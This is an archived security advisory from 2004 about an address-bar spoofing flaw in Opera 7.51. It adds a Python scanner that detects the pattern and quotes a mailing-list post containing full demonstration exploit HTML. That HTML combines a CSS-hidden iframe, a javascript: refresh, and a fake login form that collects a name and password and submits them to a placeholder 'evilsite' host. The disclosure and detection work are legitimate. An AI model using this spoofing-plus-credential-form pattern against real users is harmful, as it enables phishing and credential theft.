SecurityTracker.com
SecurityTracker Archives

Category:   Application (Web Browser)  >   Opera
Vendors:   Opera Software
Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar
SecurityTracker Alert ID:  1010528
SecurityTracker URL:  http://securitytracker.com/id/1010528
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 18 2004
Impact:   Modification of user information
Exploit Included:  Yes  
Version(s): 7.51
Description:   A scripting vulnerability was reported in the Opera browser. A remote user can create HTML that will spoof an arbitrary URL in the status bar.

bitlance winter reported that a remote user can create HTML that, when loaded by the target user, will set the URL in the status bar to an arbitrary URL.

The HTML includes an IFrame that is hidden by a cascading style sheet rule, together with a zero-second HTML Refresh directive whose target is a javascript: URL. After the refresh, the source URL of the hidden iframe is what appears in the address bar, while the visible page content is the attacker's own.

This exploit can be used in "phishing" attacks.
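As an added illustration of the pattern the description identifies (not code from the SecurityTracker entry or from the original post), the following Python scanner flags HTML that combines all three indicators: a zero-second meta refresh to a javascript: URL, a stylesheet rule hiding iframes, and an iframe whose source host differs from the page's own host. The sample page and its host names are constructed.

```python
# Heuristic scan for the address-bar spoofing pattern described above (added example).
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class SpoofPatternScanner(HTMLParser):
    def __init__(self, page_origin):
        super().__init__()
        self.page_host = urlparse(page_origin).hostname
        self.js_refresh = False      # zero-second meta refresh to a javascript: URL
        self.hidden_css = False      # stylesheet rule hiding iframe elements
        self.foreign_iframes = []    # iframe src hosts that differ from the page's host
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.match(r"\s*(\d+)\s*;\s*url\s*=\s*(.*)", a.get("content", ""), re.I)
            if m and m.group(1) == "0" and m.group(2).strip().lower().startswith("javascript:"):
                self.js_refresh = True
        elif tag == "iframe":
            host = urlparse(a.get("src", "")).hostname
            if host and host != self.page_host:
                self.foreign_iframes.append(host)
        elif tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style and re.search(r"iframe\s*\{[^}]*display\s*:\s*none", data, re.I):
            self.hidden_css = True

    handle_comment = handle_data  # <!-- --> wrappers inside <style> may arrive here


def scan_for_address_bar_spoof(html, page_origin):
    """Return the foreign iframe hosts when all three indicators co-occur, else []."""
    s = SpoofPatternScanner(page_origin)
    s.feed(html)
    return s.foreign_iframes if (s.js_refresh and s.hidden_css) else []


# Constructed sample with hypothetical hosts, not the original demonstration page.
SAMPLE = """<html><head>
<meta http-equiv="REFRESH" content="0;url=javascript:(function(){})();">
<style type="text/css"><!-- iframe { display: none !important; } --></style>
</head><body><iframe src="https://pizza.example/order.html"></iframe>
</body></html>"""
```

The scanner reports nothing when the iframe points at the page's own host or when the refresh target is an ordinary URL, so it is meant as a triage filter rather than proof of abuse.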

Impact:   A remote user can spoof the address bar.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.opera.com/
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 16 2004 (Additional Exploit Code is Available) Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar
Some additional demonstration exploit code is available.



 Source Message Contents

Subject:  [Full-Disclosure] Opera Browser version 7.51 Address Bar Spoofing Vulnerability


Hi List.

A vulnerability is found in the Opera browser version 7.51, which can be 
exploited by spammers to spoof information displayed in the address 
bar. Tested on Windows OS.

Demonstration HTML source code:

======== begin ========
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[meta http-equiv="REFRESH"
  content="0;url=javascript:(function(){})();"]
[title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
[script type="text/javascript"]
[!-- hide JavaScript from old browsers
var dummy="Do not remove this script element.";
// end hiding JavaScript --]
[/script]
[style type="text/css"]
[!-- /* hide iframe element. */
  iframe {
         display: none !important;
         }
/* hide iframe element. */ --]
[!-- /* pizza form */
  body {
         margin-left: 2em;
         margin-right: 2em;
         font-family:verdana;
         font-size:80%;
       }
  h1 { font-size:120%;}
  h2 { font-size:100%;}
  table { font-size:85%; background-color:buttonface; }
  table caption {
    background-color:activecaption; color:captiontext;
    font-weight:bold; text-align:left; }
  table table { font-size:100%; }
  table input { font-family:verdana; font-size:100%; }
  table select { font-family:verdana; font-size:100%; }
/* pizza form */ --]
[/style]
[/head]
[body]
[h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
[h2]Tested on Windows OS[/h2]
[p][a href="http://www.opera.com/" title="Opera 7.51, Everything You Need 
Online"]
Opera 7.51[/a], Everything You Need Online
[/p]
[iframe title="inline frame spoofing address bar"
src="https://pizza.opera.com/order.html"]
This inline frame is hidden. See CSS.
[/iframe]
[!-- below, phishing form order pizza --]
[h2]Welcome to Pizza Opera dot Com[/h2]
[form name="frmPizza" action="phishing://evilsite.tld"]
[table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
[caption]Order Your Pizza[/caption]
[tr valign="top"]
  [td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
  [td][input type="text" name="txtName" id="txtName"][/td]
[/tr]
[tr valign="top"]
  [td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
  [td][input type="password" name="txtPassword" id="txtPassword"][/td]
[/tr]
[tr valign="top"]
  [td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
  [td]
    [select name="selSize" id="selSize"]
    [option value="0"]--- pick a size --- [/option]
    [option value="1"]Small[/option]
    [option value="2"]Medium[/option]
    [option value="3"]Large[/option]
    [/select]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2"]
    [fieldset id="fstCrust"]
    [legend]Crust[/legend]
    [table cellpadding="1" cellspacing="0"]
    [tr]
      [td][input type="radio" name="radCrust" id="radCrust_Thick" 
value="Thick"][/td]
      [td][label for="radCrust_Thick" 
accesskey="K"]Thic[u]k[/u][/label][/td]
      [td][input type="radio" name="radCrust" id="radCrust_Thin" 
value="Thin"][/td]
      [td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
    [/tr]
    [/table]
    [/fieldset]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2"]
    [fieldset id="fstToppings"]
    [legend]Toppings[/legend]
    [table cellpadding="1" cellspacing="0"]
    [tr]
      [td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
      [td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
    [/tr]
    [tr]
      [td][input type="checkbox" name="chkPineapple" id="chkPineapple" 
value="Pineapple"][/td]
      [td][label for="chkPineapple" 
accesskey="I"]P[u]i[/u]neapple[/label][/td]
    [/tr]
    [tr]
      [td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese" 
value="Extra Cheese"][/td]
      [td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra 
Cheese[/label][/td]
    [/tr]
    [/table]
    [/fieldset]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2" align="right"][input type="submit" value="   Order!   
"][/td]
[/tr]
[/table]
[/form]
[/body]
[/html]
========= end =========
(Sorry, the code is too long.)

Thank you, List.

--
bitlance winter

P.S.
I tender my acknowledgment to my godparent, who gave me the name 'bitlance'.

